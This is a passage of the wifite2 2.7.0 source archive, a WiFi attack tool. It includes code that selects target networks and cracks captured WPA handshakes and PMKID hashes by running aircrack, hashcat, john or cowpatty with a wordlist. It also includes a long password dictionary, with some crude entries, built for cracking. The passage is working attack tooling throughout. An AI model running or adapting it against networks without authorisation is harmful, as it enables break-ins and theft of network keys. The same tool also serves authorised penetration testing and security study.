""" return sum(bool(target.attacked) for target in list(self.target_archives.values())) def found_target(self): """ Detect if we found a target specified by the user (optional). Sets this object's `target` attribute if found. Returns: True if target was specified and found, False otherwise. """ bssid = Configuration.target_bssid essid = Configuration.target_essid if bssid is None and essid is None: return False # No specific target from user. for target in self.targets: # if Configuration.wps_only and target.wps not in [WPSState.UNLOCKED, WPSState.LOCKED]: # continue if bssid and target.bssid and bssid.lower() == target.bssid.lower(): self.target = target break if essid and target.essid and essid == target.essid: self.target = target break if self.target: Color.pl('\n{+} {C}found target{G} %s {W}({G}%s{W})' % (self.target.bssid, self.target.essid)) return True return False @staticmethod def clr_scr(): import platform import os cmdtorun = 'cls' if platform.system().lower() == "windows" else 'clear' os.system(cmdtorun) def print_targets(self): """Prints targets selection menu (1 target per row).""" if len(self.targets) == 0: Color.p('\r') return if self.previous_target_count > 0 and Configuration.verbose <= 1: # Don't clear screen buffer in verbose mode. if self.previous_target_count > len(self.targets) or \ Scanner.get_terminal_height() < self.previous_target_count + 3: # Either: # 1) We have less targets than before, so we can't overwrite the previous list # 2) The terminal can't display the targets without scrolling. # Clear the screen. self.clr_scr() else: # We can fit the targets in the terminal without scrolling # 'Move' cursor up, so we will print over the previous list Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count)) self.previous_target_count = len(self.targets) # Overwrite the current line Color.p('\r{W}{D}') # First row: columns Color.p(' NUM') Color.p(' ESSID') if Configuration.show_bssids: Color.p(' BSSID') if Configuration.show_manufacturers: Color.p(' MANUFACTURER') Color.pl(' CH ENCR PWR WPS CLIENT') # Second row: separator Color.p(' ---') Color.p(' -------------------------') if Configuration.show_bssids: Color.p(' -----------------') if Configuration.show_manufacturers: Color.p(' ---------------------') Color.pl(' --- ----- ---- --- ------{W}') # Remaining rows: targets for idx, target in enumerate(self.targets, start=1): Color.clear_entire_line() Color.p(' {G}%s ' % str(idx).rjust(3)) Color.pl(target.to_str( Configuration.show_bssids, Configuration.show_manufacturers ) ) @staticmethod def get_terminal_height(): import os (rows, columns) = os.popen('stty size', 'r').read().split() return int(rows) @staticmethod def get_terminal_width(): import os (rows, columns) = os.popen('stty size', 'r').read().split() return int(columns) def select_targets(self): """ Returns list(target) Either a specific target if user specified -bssid or --essid. If the user used pillage or infinite attack mode retuns all the targets Otherwise, prompts user to select targets and returns the selection. """ if self.target: # When user specifies a specific target return [self.target] if len(self.targets) == 0: if self.err_msg is not None: Color.pl(self.err_msg) # TODO Print a more-helpful reason for failure. # 1. Link to wireless drivers wiki, # 2. How to check if your device supports monitor mode, # 3. Provide airodump-ng command being executed. raise Exception('No targets found.' + ' You may need to wait longer,' + ' or you may have issues with your wifi card') # Return all targets if user specified a wait time ('pillage'). # A scan time is always set if run in infinite mode if Configuration.scan_time > 0: return self.targets # Ask user for targets. self.print_targets() Color.clear_entire_line() if self.err_msg is not None: Color.pl(self.err_msg) input_str = '{+} Select target(s)' input_str += ' ({G}1-%d{W})' % len(self.targets) input_str += ' separated by commas, dashes' input_str += ' or {G}all{W}: ' chosen_targets = [] Color.p(input_str) for choice in input().split(','): choice = choice.strip() if choice.lower() == 'all': chosen_targets = self.targets break if '-' in choice: # User selected a range (lower, upper) = [int(x) - 1 for x in choice.split('-')] for i in range(lower, min(len(self.targets), upper + 1)): chosen_targets.append(self.targets[i]) elif choice.isdigit(): choice = int(choice) if choice > len(self.targets): Color.pl(' {!} {O}Invalid target index (%d)... ignoring' % choice) continue chosen_targets.append(self.targets[choice - 1]) return chosen_targets if __name__ == '__main__': # 'Test' script will display targets and selects the appropriate one Configuration.initialize() targets = [] try: s = Scanner() s.find_targets() targets = s.select_targets() except Exception as e: Color.pl('\r {!} {R}Error{W}: %s' % str(e)) Configuration.exit_gracefully(0) for t in targets: Color.pl(' {W}Selected: %s' % t) Configuration.exit_gracefully(0) wifite2-2.7.0/wifite/util/crack.py0000755000175000017500000002471314437644461016361 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import os from json import loads from ..config import Configuration from ..model.handshake import Handshake from ..model.pmkid_result import CrackResultPMKID from ..model.wpa_result import CrackResultWPA from ..tools.aircrack import Aircrack from ..tools.cowpatty import Cowpatty from ..tools.hashcat import Hashcat, HcxPcapngTool from ..tools.john import John from ..util.color import Color from ..util.process import Process # TODO: Bring back the 'print' option, for easy copy/pasting. Just one-liners people can paste into terminal. class CrackHelper: """Manages handshake retrieval, selection, and running the cracking commands.""" TYPES = { '4-WAY': '4-Way Handshake', 'PMKID': 'PMKID Hash' } # Tools for cracking & their dependencies. (RaduNico's code btw!) possible_tools = [ ('aircrack', [Aircrack]), ('hashcat', [Hashcat, HcxPcapngTool]), ('john', [John, HcxPcapngTool]), ('cowpatty', [Cowpatty]) ] @classmethod def run(cls): Configuration.initialize(False) # Get wordlist if not Configuration.wordlist: Color.p('\n{+} Enter wordlist file to use for cracking: {G}') Configuration.wordlist = input() Color.p('{W}') if not os.path.exists(Configuration.wordlist): Color.pl('{!} {R}Wordlist {O}%s{R} not found. Exiting.' % Configuration.wordlist) return Color.pl('') # Get handshakes handshakes = cls.get_handshakes() if len(handshakes) == 0: Color.pl('{!} {O}No handshakes found{W}') return hs_to_crack = cls.get_user_selection(handshakes) all_pmkid = all(hs['type'] == 'PMKID' for hs in hs_to_crack) # Identify missing tools missing_tools = [] available_tools = [] for tool, dependencies in cls.possible_tools: if missing := [dep for dep in dependencies if not Process.exists(dep.dependency_name)]: missing_tools.append((tool, missing)) else: available_tools.append(tool) if missing_tools: Color.pl('\n{!} {O}Unavailable tools (install to enable):{W}') for tool, deps in missing_tools: dep_list = ', '.join([dep.dependency_name for dep in deps]) Color.pl(' {R}* {R}%s {W}({O}%s{W})' % (tool, dep_list)) if all_pmkid: Color.pl('{!} {O}Note: PMKID hashes can only be cracked using {C}hashcat{W}') tool_name = 'hashcat' else: Color.p('\n{+} Enter the {C}cracking tool{W} to use ({C}%s{W}): {G}' % ( '{W}, {C}'.join(available_tools))) tool_name = input() Color.p('{W}') if tool_name not in available_tools: Color.pl('{!} {R}"%s"{O} tool not found, defaulting to {C}aircrack{W}' % tool_name) tool_name = 'aircrack' try: for hs in hs_to_crack: if tool_name != 'hashcat' and hs['type'] == 'PMKID' and 'hashcat' in missing_tools: Color.pl('{!} {O}Hashcat is missing, therefore we cannot crack PMKID hash{W}') continue cls.crack(hs, tool_name) except KeyboardInterrupt: Color.pl('\n{!} {O}Interrupted{W}') @classmethod def is_cracked(cls, file): if not os.path.exists(Configuration.cracked_file): return False with open(Configuration.cracked_file) as f: json = loads(f.read()) if json is None: return False for result in json: for k in list(result.keys()): v = result[k] if 'file' in k and os.path.basename(v) == file: return True return False @classmethod def get_handshakes(cls): handshakes = [] skipped_pmkid_files = skipped_cracked_files = 0 hs_dir = Configuration.wpa_handshake_dir if not os.path.exists(hs_dir) or not os.path.isdir(hs_dir): Color.pl('\n{!} {O}directory not found: {R}%s{W}' % hs_dir) return [] Color.pl('\n{+} Listing captured handshakes from {C}%s{W}:\n' % os.path.abspath(hs_dir)) for hs_file in os.listdir(hs_dir): if hs_file.count('_') != 3: continue if cls.is_cracked(hs_file): skipped_cracked_files += 1 continue if hs_file.endswith('.cap'): # WPA Handshake hs_type = '4-WAY' elif hs_file.endswith('.22000'): # PMKID hash if not Process.exists('hashcat'): skipped_pmkid_files += 1 continue hs_type = 'PMKID' else: continue name, essid, bssid, date = hs_file.split('_') date = date.rsplit('.', 1)[0] days, hours = date.split('T') hours = hours.replace('-', ':') date = f'{days} {hours}' if hs_type == '4-WAY': # Patch for essid with " " (zero) or dot "." in name handshakenew = Handshake(os.path.join(hs_dir, hs_file)) handshakenew.divine_bssid_and_essid() essid_discovery = handshakenew.essid essid = essid if essid_discovery is None else essid_discovery handshake = { 'filename': os.path.join(hs_dir, hs_file), 'bssid': bssid.replace('-', ':'), 'essid': essid, 'date': date, 'type': hs_type } if hs_file.endswith('.cap'): # WPA Handshake handshake['type'] = '4-WAY' elif hs_file.endswith('.22000'): # PMKID hash handshake['type'] = 'PMKID' else: continue handshakes.append(handshake) if skipped_pmkid_files > 0: Color.pl( '{!} {O}Skipping %d {R}*.22000{O} files because {R}hashcat{O} is missing.{W}\n' % skipped_pmkid_files) if skipped_cracked_files > 0: Color.pl('{!} {O}Skipping %d already cracked files.{W}\n' % skipped_cracked_files) # Sort by Date (Descending) return sorted(handshakes, key=lambda x: x.get('date'), reverse=True) @classmethod def print_handshakes(cls, handshakes): # Header max_essid_len = max([len(hs['essid']) for hs in handshakes] + [len('ESSID (truncated)')]) Color.p('{W}{D} NUM') Color.p(' ' + 'ESSID (truncated)'.ljust(max_essid_len)) Color.p(' ' + 'BSSID'.ljust(17)) Color.p(' ' + 'TYPE'.ljust(5)) Color.p(' ' + 'DATE CAPTURED\n') Color.p(' ---') Color.p(' ' + ('-' * max_essid_len)) Color.p(' ' + ('-' * 17)) Color.p(' ' + ('-' * 5)) Color.p(' ' + ('-' * 19) + '{W}\n') # Handshakes for index, handshake in enumerate(handshakes, start=1): Color.p(' {G}%s{W}' % str(index).rjust(3)) Color.p(' {C}%s{W}' % handshake['essid'].ljust(max_essid_len)) Color.p(' {O}%s{W}' % handshake['bssid'].ljust(17)) Color.p(' {C}%s{W}' % handshake['type'].ljust(5)) Color.p(' {W}%s{W}\n' % handshake['date']) @classmethod def get_user_selection(cls, handshakes): cls.print_handshakes(handshakes) Color.p( '{+} Select handshake(s) to crack ({G}%d{W}-{G}%d{W}, select multiple with ' '{C},{W} or {C}-{W} or {C}all{W}): {G}' % (1, len(handshakes))) choices = input() Color.p('{W}') selection = [] for choice in choices.split(','): if '-' in choice: first, last = [int(x) for x in choice.split('-')] for index in range(first, last + 1): selection.append(handshakes[index - 1]) elif choice.strip().lower() == 'all': selection = handshakes[:] break elif [c.isdigit() for c in choice]: index = int(choice) selection.append(handshakes[index - 1]) return selection @classmethod def crack(cls, hs, tool): Color.pl('\n{+} Cracking {G}%s {C}%s{W} ({C}%s{W})' % ( cls.TYPES[hs['type']], hs['essid'], hs['bssid'])) if hs['type'] == 'PMKID': crack_result = cls.crack_pmkid(hs, tool) elif hs['type'] == '4-WAY': crack_result = cls.crack_4way(hs, tool) else: raise ValueError(f'Cannot crack handshake: Type is not PMKID or 4-WAY. Handshake={hs}') if crack_result is None: # Failed to crack Color.pl('{!} {R}Failed to crack {O}%s{R} ({O}%s{R}): Passphrase not in dictionary' % ( hs['essid'], hs['bssid'])) else: # Cracked, replace existing entry (if any), or add to Color.pl('{+} {G}Cracked{W} {C}%s{W} ({C}%s{W}). Key: "{G}%s{W}"' % ( hs['essid'], hs['bssid'], crack_result.key)) crack_result.save() @classmethod def crack_4way(cls, hs, tool): handshake = Handshake(hs['filename'], bssid=hs['bssid'], essid=hs['essid']) try: handshake.divine_bssid_and_essid() except ValueError as e: Color.pl('{!} {R}Error: {O}%s{W}' % e) return None if tool == 'aircrack': key = Aircrack.crack_handshake(handshake, show_command=True) elif tool == 'hashcat': key = Hashcat.crack_handshake(handshake, show_command=True) elif tool == 'john': key = John.crack_handshake(handshake, show_command=True) elif tool == 'cowpatty': key = Cowpatty.crack_handshake(handshake, show_command=True) if key is not None: return CrackResultWPA(hs['bssid'], hs['essid'], hs['filename'], key) else: return None @classmethod def crack_pmkid(cls, hs, tool): if tool != 'hashcat': Color.pl('{!} {O}Note: PMKID hashes can only be cracked using {C}hashcat{W}') key = Hashcat.crack_pmkid(hs['filename'], verbose=True) if key is not None: return CrackResultPMKID(hs['bssid'], hs['essid'], hs['filename'], key) else: return None if __name__ == '__main__': CrackHelper.run() wifite2-2.7.0/wifite/util/timer.py0000755000175000017500000000200314437644461016402 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import time class Timer(object): def __init__(self, seconds): self.start_time = time.time() self.end_time = self.start_time + seconds def remaining(self): return max(0, self.end_time - time.time()) def ended(self): return self.remaining() == 0 def running_time(self): return time.time() - self.start_time def __str__(self): """ Time remaining in minutes (if > 1) and seconds, e.g. 5m23s""" return Timer.secs_to_str(self.remaining()) @staticmethod def secs_to_str(seconds): """Human-readable seconds. 193 -> 3m13s""" if seconds < 0: return '-%ds' % seconds rem = int(seconds) hours = rem // 3600 mins = int((rem % 3600) / 60) secs = rem % 60 if hours > 0: return '%dh%dm%ds' % (hours, mins, secs) elif mins > 0: return '%dm%ds' % (mins, secs) else: return '%ds' % secs wifite2-2.7.0/wifite/util/input.py0000755000175000017500000000040014437644461016420 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- # Fix for raw_input on python3: https://stackoverflow.com/a/7321970 try: input = raw_input except NameError: pass raw_input = input try: range = xrange except NameError: pass xrange = range wifite2-2.7.0/wifite/util/color.py0000755000175000017500000000747614437644461016423 0ustar sophiesophie#!/usr/bin/env python # -*- coding: utf-8 -*- import sys class Color(object): """ Helper object for easily printing colored text to the terminal. """ # Basic console colors colors = { 'W': '\033[0m', # white (normal) 'R': '\033[31m', # red 'G': '\033[32m', # green 'O': '\033[33m', # orange 'B': '\033[34m', # blue 'P': '\033[35m', # purple 'C': '\033[36m', # cyan 'GR': '\033[37m', # gray 'D': '\033[2m' # dims current color. {W} resets. } # Helper string replacements replacements = { '{+}': ' {W}{D}[{W}{G}+{W}{D}]{W}', '{!}': ' {O}[{R}!{O}]{W}', '{?}': ' {W}[{C}?{W}]' } last_sameline_length = 0 @staticmethod def p(text): """ Prints text using colored format on same line. Example: Color.p('{R}This text is red. {W} This text is white') """ sys.stdout.write(Color.s(text)) sys.stdout.flush() if '\r' in text: text = text[text.rfind('\r') + 1:] Color.last_sameline_length = len(text) else: Color.last_sameline_length += len(text) @staticmethod def pl(text): """Prints text using colored format with trailing new line.""" Color.p('%s\n' % text) Color.last_sameline_length = 0 @staticmethod def pe(text): """ Prints text using colored format with leading and trailing new line to STDERR. """ sys.stderr.write(Color.s('%s\n' % text)) Color.last_sameline_length = 0 @staticmethod def s(text): """ Returns colored string """ output = text for (key, value) in list(Color.replacements.items()): output = output.replace(key, value) for (key, value) in list(Color.colors.items()): output = output.replace('{%s}' % key, value) return output @staticmethod def clear_line(): spaces = ' ' * Color.last_sameline_length sys.stdout.write('\r%s\r' % spaces) sys.stdout.flush() Color.last_sameline_length = 0 @staticmethod def clear_entire_line(): import os (rows, columns) = os.popen('stty size', 'r').read().split() Color.p('\r' + (' ' * int(columns)) + '\r') @staticmethod def pattack(attack_type, target, attack_name, progress): """ Prints a one-liner for an attack. Includes attack type (WEP/WPA), target ESSID & power, attack type, and progress. ESSID (Pwr) Attack_Type: Progress e.g.: Router2G (23db) WEP replay attack: 102 IVs """ essid = '{C}%s{W}' % target.essid if target.essid_known else '{O}unknown{W}' Color.p('\r{+} {G}%s{W} ({C}%sdb{W}) {G}%s {C}%s{W}: %s ' % ( essid, target.power, attack_type, attack_name, progress)) @staticmethod def pexception(exception): """Prints an exception. Includes stack trace if necessary.""" Color.pl('\n{!} {R}Error: {O}%s' % str(exception)) # Don't dump trace for the "no targets found" case. if 'No targets found' in str(exception): return from ..config import Configuration if Configuration.verbose > 0 or Configuration.print_stack_traces: Color.pl('\n{!} {O}Full stack trace below') from traceback import format_exc Color.p('\n{!} ') err = format_exc().strip() err = err.replace('\n', '\n{!} {C} ') err = err.replace(' File', '{W}File') err = err.replace(' Exception: ', '{R}Exception: {O}') Color.pl(err) if __name__ == '__main__': Color.pl('{R}Testing{G}One{C}Two{P}Three{W}Done') print((Color.s('{C}Testing{P}String{W}'))) Color.pl('{+} Good line') Color.pl('{!} Danger') wifite2-2.7.0/wordlist-probable.txt0000644000175000017500001006005614437644461016652 0ustar sophiesophie1Password password 123456789 12345678 1q2w3e4r sunshine aphcueqgglktu football 1234567890 computer superman internet iloveyou 1qaz2wsx baseball whatever princess abcd1234 starwars trustno1 password1 jennifer michelle mercedes benjamin 11111111 samantha victoria alexander 987654321 asdf1234 1234qwer qwertyuiop q1w2e3r4 elephant garfield chocolate jonathan caroline maverick midnight 88888888 creative qwerty123 cocacola passw0rd liverpool blink182 asdfghjkl danielle scorpion veronica nicholas asdfasdf metallica december patricia christian spiderman security slipknot november jordan23 qwertyui butterfly swordfish carolina hardcore corvette 12341234 remember qwer1234 leonardo snickers williams angelina anderson 123123123 pakistan marlboro kimberly 00000000 snowball sebastian godzilla hello123 champion precious einstein napoleon mountain dolphins charlotte fernando basketball barcelona 87654321 paradise motorola bullshit brooklyn stephanie elizabeth qwerty12 franklin american platinum icecream darkness cristina colorado alexandra steelers serenity mitchell lollipop marshall 1qazxsw2 12344321 startrek christine business nintendo 12qwaszx asdfghjk Password 1q2w3e4r5t zaq12wsx scotland hercules explorer manchester firebird engineer virginia simpsons angelica september isabelle isabella changeme passport infinity superstar courtney scarface pavilion abcdefgh a1b2c3d4 harrison spitfire catherine birthday wolverine guinness california logitech emmanuel 11223344 goldfish cheyenne testtest stargate microsoft anything aaaaaaaa welcome1 eternity westside password123 maryjane michael1 lawrence kristina kawasaki drowssap blahblah babygirl poohbear florence sapphire hamilton greenday qazwsxedc twilight swimming stardust predator penelope michigan margaret brittany shithead redskins pussycat fireball cherokee australia 1234abcd lovelove thailand lasvegas butthead blizzard shamrock bluebird atlantis 147258369 valentine magnolia juventus diamonds christopher warcraft renegade mohammed terminator shopping savannah giovanni 12121212 wildcats portugal beautiful sunflower santiago kathleen enterprise clifford christina 55555555 something rosemary vacation hollywood chandler 99999999 lorraine children beatrice airborne valentin moonlight kamikaze strawberry software 22222222 skywalker salvador panthers lacrosse charlie1 cardinal bluemoon 0123456789 zeppelin rockstar operator dragonfly dickhead anaconda amsterdam 789456123 77777777 skittles personal kingkong geronimo christmas wrestling robinson lightning kingston hannibal download darkstar undertaker tinkerbell sweetpea softball panasonic pa55word keyboard darkside cleopatra assassin vladimir national matthew1 godfather brothers warriors universe rush2112 mushroom bigdaddy 1a2b3c4d ultimate peterpan loverboy truelove trombone madeline gangster dingdong catalina alejandro kittycat aquarius 1111111111 patriots jamesbond ihateyou blessing airplane Password1 stingray hellfire guardian flamingo 0987654321 socrates richmond electric thankyou sterling munchkin morpheus imperial happiness goodluck columbia campbell blackjack 999999999 telephone oblivion newcastle freedom1 washington valentina valencia spectrum jessica1 jeremiah handsome goldberg gabriela anthony1 a1234567 xxxxxxxx peekaboo motherfucker montreal katherine kangaroo immortal chocolat thompson research oklahoma mariposa idontknow defender applepie squirrel pineapple hongkong dinosaur babydoll wolfgang semperfi patience fletcher drpepper creation wordpass passwort original nightmare martinez labrador excalibur discovery apple123 sundance redwings mypassword monopoly margarita lionking football1 director 44444444 sylvester sherlock marianne lancelot jeanette cannabis andromeda werewolf starcraft marathon longhorn happy123 brucelee argentina 147852369 wrangler william1 stranger scarlett qweasdzxc playstation morrison february fantasia designer bulldogs sullivan saturday pingpong kristine halloween fuckyou1 fearless cassandra bismillah airforce theodore starfish pass1234 cinnamon sweetheart overlord michaela meredith buttercup abc12345 aardvark Passw0rd 12345678910 universal trinidad thursday standard pearljam anonymous springer ragnarok portland nathalie lemonade lavender gotohell gladiator freckles crusader commando clarence cadillac alexandre 123654789 verbatim umbrella splinter register qwert123 penguins ncc1701d estrella downtown colombia chemistry bollocks anastasia 741852963 69696969 showtime revolution qwerasdf password2 mongoose illusion cooldude abracadabra 123qweasd treasure pinkfloyd passwords linkinpark education underground monalisa justdoit ericsson chelsea1 achilles a1s2d3f4 veronika test1234 teddybear sporting papillon nevermind marketing juliette gabrielle fuckyou2 firewall evolution cristian cavalier canadian admin123 together spongebob pa55w0rd halflife formula1 dragonball thirteen stonecold rastaman mustang1 cucumber skateboard sheridan qqqqqqqq punisher lovelife gretchen chevelle chester1 administrator wireless volleyball sandiego pokemon1 lollypop gorgeous chickens blueberry blackman blackbird atlantic wildfire waterloo singapore rocknroll mississippi james123 homework highland eldorado discover computer1 alphabet 123456789a 1123581321 zaq1xsw2 webmaster university tropical southpark question presario poiuytrewq notebook nebraska bullseye valhalla tomorrow starlight richard1 positive plymouth patrick1 faithful dominique doberman criminal crackers converse casanova attitude 66666666 wonderful scooter1 scoobydoo rochelle punkrock messenger kentucky insomnia hooligan gertrude capricorn blueeyes blackberry blablabla terminal snowflake poseidon paranoid mastermind laurence istanbul frederic doomsday bradford bonehead apollo13 alessandro westwood supernova satan666 reynolds qazwsx123 q1w2e3r4t5 mckenzie magician jellybean innocent hotstuff fountain concrete capslock snuggles professor megadeth medicine lionheart jackson1 intrepid highlander green123 geoffrey francisco dynamite columbus cinderella chemical chargers username superman1 sherwood moonbeam meowmeow matthias josephine jackson5 honolulu diamond1 crawford broadway backspace asdasdasd zzzzzzzz whocares watermelon svetlana southern president pleasure makaveli honeybee francois chicken1 bookworm PASSWORD 33333333 woodstock sunlight stallion katerina jefferson international hellokitty hedgehog happyday frederick davidson dangerous cerberus blackcat arsenal1 angel123 10101010 training roadrunner republic recovery maradona intruder hermione hastings goldstar fredfred federico deftones commander chevrolet blackout billabong 1234567a 1234554321 yesterday wolfpack thunder1 tacobell sweetness solution shanghai satellite rootbeer phillips monsters lonewolf keystone johannes grateful continue confused brighton 0000000000 yankees1 triangle peterson marianna mandrake inuyasha hardware freebird ferguson dominick bullfrog babylon5 13131313 zanzibar transfer television sparkles shepherd resident property pictures mischief macintosh kristian kissmyass hurricane heineken hahahaha eastside daffodil charming billybob armstrong adventure adelaide underdog technics samsung1 qwerty1234 phoenix1 musicman marjorie letmein1 jerusalem information iloveyou1 hospital handball gonzales darkangel budapest brandon1 alliance adrienne aberdeen abc123456 1234512345 wonderland thuglife sentinel richards rammstein newyork1 mortimer marcello magazine infantry hopeless harrypotter fandango deadhead clarissa christie charlene billyboy bangbang absolute titanium tiger123 superior stefanie spaceman somebody sinclair pppppppp paintball mmmmmmmm military marijuana mackenzie loveless lighthouse karolina jesuschrist fernanda felicity dietcoke cleveland brewster babyblue ashleigh 1q2w3e4r5t6y 14789632 whiskers valkyrie superfly strength seventeen progress muhammad maryland evergreen daughter clarinet chuckles beethoven almighty aaaaaaaaaa 9876543210 1qaz1qaz waterfall sneakers saratoga qawsedrf motocross majestic kingfish japanese graphics flounder coltrane chris123 checkers barbados augustus angelika 12345qwert washburn tottenham survivor stanford soulmate rasputin pallmall overkill meatloaf lowrider katarina ilovegod heather1 hallo123 giuseppe eastwood dominion destroyer chiquita chipmunk castillo berkeley alexandria 1122334455 1029384756 thinking tarheels seminole radiohead priscilla pornstar platypus nirvana1 mephisto lancaster knowledge johnjohn gameover fuckface david123 darklord cutiepie carnival candyman blowfish ssssssss snowboard sandwich sailboat mandarin knuckles jasmine1 hardrock daredevil boomboom benedict babyface albatros 963852741 valentino sprinter salvation rolltide rodriguez r2d2c3po password12 mustangs moonshine missouri meridian meatball malaysia killbill illinois gonzalez georgina gargoyle evangelion disaster complete claymore cheesecake chainsaw bluebell 98765432 wishbone warhammer viewsonic vampires thunderbird smashing rhiannon rachelle playtime offspring marcella lonestar heritage hayabusa freestyle forsaken ferrari1 challenger backdoor asshole1 147896325 11235813 yosemite yogibear talisman taekwondo syracuse supersonic randolph raistlin preacher millions metallic madison1 losangeles hernandez dontknow coolcool charisma wednesday starwars1 sinister passpass mohammad mcdonald goldeneye frontier francesca flipflop fisherman eggplant dannyboy daniella chrysler cameron1 cambridge buckshot arkansas archangel america1 12345679 romantic robotics redalert megatron mamapapa hyperion hamburger gabriel1 fuckfuck friendship friendly florida1 dreaming doghouse disturbed christin bubblegum brigitte addicted underworld shadow12 porkchop negative mistress melissa1 jermaine james007 gabriella francine delphine crystal1 computers chestnut baseball1 auckland 321654987 wanderer vancouver tomahawk thanatos syncmaster snoopdog roderick princesa pentagon nathaniel money123 millenium mechanic liverpool1 francesco esmeralda creature cornwall chadwick carpediem calendar abdullah vendetta supervisor stephane revolver railroad qwerty12345 p4ssw0rd minnesota mariners iloveyou2 holyshit elisabeth database bumblebee bobafett bernardo amethyst albatross advanced whistler wellington slamdunk sheffield scrabble roadkill realmadrid rainbows polopolo obsidian northern learning independent impossible elements electron customer budweiser brisbane baritone armageddon amarillo alexandr aerosmith 12301230 windmill vanhalen surprise starfire speakers ncc1701e lifetime kittykat fredrick fidelity fabulous everyday coolness concorde catwoman casablanca blackhawk babybaby vodafone traveler southside rainbow1 princess1 potatoes pipeline philippe pathfinder monterey lipstick lakeside internet1 insanity fishbone chihuahua bordeaux biohazard 21122112 windsurf velocity vagabond topsecret reloaded raindrop prudence professional pharmacy peaceful multimedia montgomery marseille marietta letmein2 ladybird internal gigabyte fourteen dolphin1 chambers bunghole buckeyes bluefish apocalypse aphrodite 4815162342 23232323 12369874 111222333 zerocool wrestler tortoise sysadmin sunshine1 starship qwerty123456 qwerty11 primrose politics paranoia pancakes overload opensesame nevermore melbourne matthews marriage magdalena macaroni jonathon jacqueline jackjack infinite heinrich graduate goodness godspeed feedback cornelia corleone choochoo challenge chairman butthole buddy123 barracuda azsxdcfv accounting sleeping remington quicksilver pringles power123 paradigm nickolas navigator nautilus milkshake master123 feathers facebook dragon12 brittney aviation avalanche 19841984 123qweasdzxc 10203040 wildwood thrasher speedway songbird sickness shannon1 screamer samantha1 riverside princeton monster1 mauricio manhattan love1234 jennifer1 indonesia devil666 bugsbunny budlight ambrosia adrianna zxcvbnm1 windows1 toulouse tazmania spaghetti slapshot ministry mathilde lighting helsinki girlfriend gateway1 fussball frederik flexible festival destiny1 daydream coventry constant connection charles1 angeline a123456789 111111111 woodland skinhead signature sandrine rockford merchant greatest everlast espresso elizabet dragon123 dddddddd community chouchou charlton champagne carlitos blueblue awesome1 aspirine 12345abc technology stronger starbuck skeleton scissors reginald redeemer polarbear normandy luckydog laserjet just4fun greenbay graffiti fantastic doughboy dortmund building bbbbbbbb annabelle annabell alchemist zimbabwe wisconsin winchester tunafish thisisit stafford spalding sometimes solitude robotech rainbow6 qazwsx12 pooppoop minister leonidas kirkland integral incognito ilovesex ignatius heavenly gggggggg ferdinand exchange bulldog1 blackdog bearbear 123454321 winfield westlife thriller summertime spartans sausages salvatore salamander printing palmtree opendoor mosquito milkyway mcdonalds laughter klondike kingsley jesus123 invisible humphrey hillside hattrick hammerhead function forgotten fighting excellent delaware darthvader costello catalyst cardinals bobmarley babylove assholes andersen alexande 19891989 1234asdf whiplash tiffany1 solutions smallville slimshady sammy123 rockwell robinhood reddevil maxwell1 madeleine gordon24 glendale giovanna foxylady fortress favorite doughnut comanche cheshire cherries catarina bertrand barefoot arabella alligator 1qaz2wsx3edc vanguard stuttgart stephen1 rhapsody reckless pumpkin1 powerful painting nocturne nickname mynameis mikemike llllllll leighton kkkkkkkk kingfisher johnston holidays henderson handyman fuckoff1 front242 flamenco escalade division covenant churchill cannibal badminton annmarie alexander1 alcatraz 11112222 wwwwwwww wildcard whitesox vincent1 thornton temporary survival supernatural sprocket somerset skorpion services saxophone sacrifice restless pumpkins operation nosferatu newpassword monkey123 michelle1 meathead management lucky123 licorice language jackass1 infiniti generation gamecube flanders edinburgh disciple diplomat crescent counterstrike catholic capoeira calculator browning biscuits alexalex P@ssw0rd Jennifer 19861986 123456abc winston1 violator tangerine super123 straight sorcerer sidekick shredder schubert prestige peter123 nonsense mulligan moneyman matchbox marauder longhair lisalisa kayleigh islander grasshopper geraldine genesis1 gardenia gabriele everything edmonton downhill digital1 cromwell chowchow carebear bettyboop vanessa1 terrapin tennessee stockton spartacus smoothie seahawks revelation rebecca1 rangers1 qweqweqwe puppydog marigold gregorio goldfinger gangbang dutchess daylight constantine clueless calamity beefcake aquarium anathema ambition a12345678 19821982 wildlife undercover snowbird schneider qwert12345 qwerqwer prospect porsche911 pendragon natalie1 lockdown lkjhgfdsa jellyfish italiano irishman infamous hydrogen hartford goodyear generals garrison foxhound entrance eighteen dimension diamante daedalus cocktail chameleon caligula borabora behemoth balloons bachelor 123698745 waterman teenager spanking soccer10 sergeant seashell seahorse scarecrow riffraff possible pittsburgh pinnacle nostromo maximilian latitude kevin123 kamasutra invasion hibiscus hallmark firestorm fernandez envision desperado charcoal character blue1234 antelope alejandra aircraft 123456aa 123456123 viktoria unlimited transport stripper stefania snowwhite smirnoff seraphim sebastien ronaldo7 reporter raiders1 painkiller nineteen monolith moneymaker memories memorial massacre lamborghini honduras goofball fullmoon forever1 engineering elefante dragonballz doorknob dipstick commerce carousel callisto brilliant berenice barbarian asdfzxcv alex1234 Welcome1 1qa2ws3ed 19871987 12345678a wormwood volkswagen starstar sexygirl sephiroth schumacher rosewood rochester roadster rapunzel prisoner prescott pizza123 phillies phantom1 perfect1 pasadena optimist monkeyboy metropolis master12 kimberley junkmail inspiron hhhhhhhh hellohello griffith greenwood golfball forester euphoria england1 death666 cornelius constance conquest clitoris cartoons buckaroo bluejays Alexander volunteer violence testpass terrence temporal teamwork spencer1 silverado shipping serendipity roosters prophecy popcorn1 playmate panorama p0o9i8u7 marcopolo landmark johnson1 iverson3 instinct infected illuminati honeydew foundation forbidden esperanza document deadline crocodile cowboys1 climbing bubbles1 bluestar birmingham bathroom baltimore anamaria 25802580 24682468 whiteboy trinitron titleist tiberius testing123 superhero sidewinder rosemarie retarded primavera peppermint palomino outsider oooooooo musician michelin juggernaut ironmaiden hyacinth gatorade fuzzball everyone dictionary development delirium daisy123 critical cordelia collection capitals caliente bobdylan blackrose birdhouse asparagus Michelle 1a2s3d4f 19781978 voltaire thedoors submarine stonewall special1 southpaw soccer12 sanctuary ruthless reaction qazwsxed prometheus portable password11 passcode official neverland mindless masamune legendary lalalala incredible holloway heartless hairball genevieve fireworks dirtbike dilligaf crossfire clippers chicago1 caldwell bernadette agent007 19831983 19801980 19751975 waterpolo warrior1 vertical timeless thegreat superuser spelling slippery rrrrrrrr ricochet redemption raspberry protocol producer penguin1 patterson p455w0rd olivetti oliveira metalica mannheim mandingo magellan machines lovebird jonathan1 jason123 inflames 